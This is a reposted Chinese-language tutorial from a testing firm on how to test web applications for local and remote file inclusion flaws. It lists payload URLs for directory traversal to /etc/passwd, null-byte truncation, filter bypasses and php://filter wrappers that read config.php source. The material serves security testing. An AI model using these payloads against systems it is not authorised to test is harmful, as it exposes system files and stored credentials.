第三方網站測評:【WEB應用文件包含漏洞（LFI/RFI）的測試步驟】

文件包含漏洞分為本地文件包含（LFI）和遠程文件包含（RFI）兩類。LFI允許讀取服務器本地文件，RFI可執行遠程服務器上的惡意代碼。PHP應用中include()、require()等函數未正確過濾用戶輸入時易產生此類漏洞。

檢測URL中可能包含文件的參數，常見特征如下：
參數名包含file、path、page、include等關鍵詞
參數值為文件路徑格式（如.php、.inc、.html）
參數值呈現目錄遍歷特征（../或..\）

使用Burp Suite抓取所有請求，篩選出可能包含文件操作的參數。對每個可疑參數進行基礎測試：
如：
https://www.zmtests.com/d.php?file=../../../../etc/passwd
https://www.zmtests.com/d.php?page=php://filter/convert.base64-encode/resource=index.php

使用空字節截斷繞過擴展名限制（PHP<5.3.4）：
如：
https://www.zmtests.com/d.php?file=../../etc/passwd%00
https://www.zmtests.com/d.php?file=....//....//etc/passwd

利用PHP包裝器讀取源碼：
如：
php://filter/convert.base64-encode/resource=index.php
php://filter/read=string.rot13/resource=config.php

本文來自互聯網用戶投稿，該文觀點僅代表作者本人，不代表本站立場。本站僅提供信息存儲空間服務，不擁有所有權，不承擔相關法律責任。
如若轉載，請注明出處：http://www.pswp.cn/news/921589.shtml
繁體地址，請注明出處：http://hk.pswp.cn/news/921589.shtml
英文地址，請注明出處：http://en.pswp.cn/news/921589.shtml

如若內容造成侵權/違法違規/事實不符，請聯系多彩編程網進行投訴反饋email:809451989@qq.com，一經查實，立即刪除！